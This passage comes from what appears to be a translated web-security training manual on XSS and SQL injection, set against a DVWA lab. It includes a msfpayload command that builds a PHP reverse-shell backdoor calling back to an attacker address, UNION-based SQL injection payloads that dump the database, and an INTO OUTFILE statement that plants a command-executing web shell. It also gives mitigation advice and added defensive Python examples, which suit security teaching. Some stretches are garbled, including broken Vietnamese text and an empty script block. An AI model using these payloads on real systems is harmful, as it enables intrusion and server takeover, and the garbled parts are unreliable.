We can send this cookie straight to the attacking machine instead of merely showing it on screen.
We can insert iframe tags:
<iframe src="http://www.ctu.edu.vn"></iframe>

In addition, we can use the Metasploit Framework (introduced above) to attack and take control, with a backdoor that lets the target machine connect back. Command to create the backdoor:
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.10.102 LPORT=4444 R > forum.php

97


Dng msfconsole v thit lp cc thng s cn thit lng nghe kt ni trn
server:

Tr li XSS Stored, ta s dng script:

98

<script>
Windows.
</script>

Once the script above has run, the Metasploit Framework receives the connection and we can proceed with the attack.

Some screenshots of the attack:

f) Some methods of prevention and mitigation
Nobody can fully gauge how dangerous XSS is, but it is also not too hard to prevent. There are many ways to address the problem. OWASP (The Open Web Application Standard Project) says that to build highly secure websites, user-supplied data should be handled as follows:
Accept only valid data.
Refuse bad data.
Continuously check and sanitise data.
Web developers can protect their websites from being abused through XSS by ensuring that dynamically generated pages contain no script tags: filter and validate all input from the user side, or encode and filter the values that are output to the user.
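The following is an added example, written for this document rather than taken from the manual or from OWASP, of the "encode the values that are output" rule. It assumes Python's standard html and urllib modules; the stored comment is a constructed sample reusing the alert payload shown earlier in this section, and the http(s)-only scheme allowlist in render_link is an assumption of the example, not a rule the manual states.

```python
import html
from urllib.parse import quote

# Constructed sample: a comment as a guestbook form might have stored it,
# reusing the alert payload shown earlier in this section.
STORED_COMMENT = '<script>alert(document.cookie);</script>'


def render_unsafe(comment: str) -> str:
    """Vulnerable pattern: the stored value is pasted into the page as-is,
    so any tag inside it becomes part of the page and runs in the browser."""
    return '<div class="comment">' + comment + '</div>'


def render_encoded(comment: str) -> str:
    """Hardened pattern: HTML-encode for the element body context, so
    <, >, &, " and ' are shown as text instead of being parsed as markup."""
    return '<div class="comment">' + html.escape(comment, quote=True) + '</div>'


def render_attribute(value: str) -> str:
    """Attribute context: always quote the attribute *and* encode both quote
    kinds, otherwise a value can close the attribute and add a new one."""
    return ('<input type="text" name="name" value="'
            + html.escape(value, quote=True) + '">')


def render_link(url: str) -> str:
    """URL context: allow only http(s) targets (an assumption of this
    example), percent-encode the rest, then HTML-encode for the attribute."""
    if not url.lower().startswith(('http://', 'https://')):
        url = 'about:blank'  # non-http schemes are dropped here
    safe_url = quote(url, safe=':/?&=#%')
    return '<a href="' + html.escape(safe_url, quote=True) + '">link</a>'


def contains_active_markup(markup: str) -> bool:
    """Rough check used to demonstrate the difference: does a script or
    iframe tag survive in the rendered output?"""
    low = markup.lower()
    return '<script' in low or '<iframe' in low


if __name__ == '__main__':
    for render in (render_unsafe, render_encoded):
        out = render(STORED_COMMENT)
        print(render.__name__, '->', out, '| active markup:',
              contains_active_markup(out))
```

The point of having three render functions is that the encoding depends on where the value lands: body text, an attribute value and a URL each need their own treatment, and a single "strip script tags" filter covers none of them reliably.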
2. SQL Injection
a) What is SQL Injection?
SQL Injection is one of the web hacking techniques that is becoming increasingly common today. By injecting SQL query/command code into the input before it is handed to the web application for processing, we can log in without a username and password, obtain remote execution, dump data and gain root on the SQL server. The attack tool is any web browser, such as Internet Explorer, Firefox, Google Chrome, ...

b) Steps to exploit the web page vulnerability
Go to http://localhost/dvwa/ and select SQL Injection (Blind):

We begin exploiting the flaw from the User ID input box:
Enter: 1

If instead we enter 1' or '1'='1 or 1' or ''='#, we get a very surprising result:

The # character is used to cancel the effect of the closing (') in the SQL query:
SELECT first_name, last_name FROM users WHERE user_id = '$user_id'
View the database name: a' UNION select 1, database();#

View the user and system user: a' UNION select system_user(), user();#


Determine the user name in use and the MySQL version

View all database names together with their tables in the MySQL DBMS:
a' UNION select table_schema, table_name from information_schema.tables;#

We can add a WHERE condition to narrow the results:
a' UNION select table_schema, table_name from information_schema.tables where table_schema='dvwa';#

List the columns of the tables:
a' UNION select table_name, column_name from information_schema.columns where table_schema='dvwa';#

Continue by executing the following statement:
' union select '','<?php $print=shell_exec($_GET["cmd"]); echo "<pre>$print</pre>"; ?>' into outfile 'C:\\xampp\\htdocs\\sqlinjection.php';#
Once the file has been created, we only need to run commands from the browser by appending ?cmd=command. For example, 192.168.10.20/sqlinjection.php?cmd=dir gives us:

Now we have full control of the victim's computer.
c) Countermeasures against SQL Injection
Change the default password of the root user
Delete all default stored procedures on the server
Filter potentially harmful characters such as quotation marks, : and # as soon as a query request is received from outside
Update SQL with the latest releases
Block SQL-sensitive keywords with a firewall right at the input
Encrypt passwords
Strip the keywords SELECT, DELETE, INSERT, ... from queries coming from outside.
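Character and keyword filtering, as listed above, is hard to make complete; the usual complement is to keep untrusted input out of the SQL text altogether. The following added example, written for this document and not taken from the manual or from DVWA, builds the lookup query from section b) both ways: concatenated, as the vulnerable page does, and with a bound parameter plus an allowlist check on the User ID field. It assumes Python's standard sqlite3 module with an in-memory database standing in for the MySQL users table; the three rows are constructed sample data.

```python
import sqlite3

# Constructed sample rows standing in for the DVWA-style 'users' table.
SAMPLE_USERS = [(1, 'admin', 'admin'), (2, 'Gordon', 'Brown'), (3, 'Hack', 'Me')]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database (an assumption of this example; the manual
    targets MySQL) with the columns the lookup query reads."""
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE users (user_id INTEGER PRIMARY KEY, '
                 'first_name TEXT, last_name TEXT)')
    conn.executemany('INSERT INTO users VALUES (?, ?, ?)', SAMPLE_USERS)
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """Vulnerable: the same string-built query as the manual's example, so a
    quote in the input ends the literal and the remainder is parsed as SQL."""
    sql = ("SELECT first_name, last_name FROM users WHERE user_id = '"
           + user_id + "'")
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, user_id: object) -> list:
    """Hardened: the value travels as a bound parameter and is never parsed
    as SQL text, so no quote, comment marker or UNION can alter the query."""
    sql = 'SELECT first_name, last_name FROM users WHERE user_id = ?'
    return conn.execute(sql, (user_id,)).fetchall()


def validate_user_id(raw: str) -> int:
    """'Accept only valid data': the field is a numeric id, so anything that
    is not a short run of digits is rejected before it reaches the database."""
    if not raw.isdigit() or len(raw) > 9:
        raise ValueError('user_id must be a positive integer')
    return int(raw)


def is_rejected(raw: str) -> bool:
    """True when the allowlist check refuses the input."""
    try:
        validate_user_id(raw)
    except ValueError:
        return True
    return False


def lookup_hardened(conn: sqlite3.Connection, raw: str) -> list:
    """Validation plus parameter binding: the shape of the query never varies."""
    return lookup_parameterized(conn, validate_user_id(raw))


if __name__ == '__main__':
    db = make_db()
    probe = "1' or '1'='1"  # the input shown in section b)
    print('concatenated :', lookup_vulnerable(db, probe))
    print('parameterized:', lookup_parameterized(db, probe))
    print('validated    :', 'rejected' if is_rejected(probe)
          else lookup_hardened(db, probe))
```

With the concatenated query the probe returns every row; with the bound parameter the same string is compared as a whole against user_id and matches nothing, and the allowlist check rejects it before any query runs. Parameter binding is what makes the keyword-stripping item in the list unnecessary for the query itself, since the database never sees the input as SQL.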

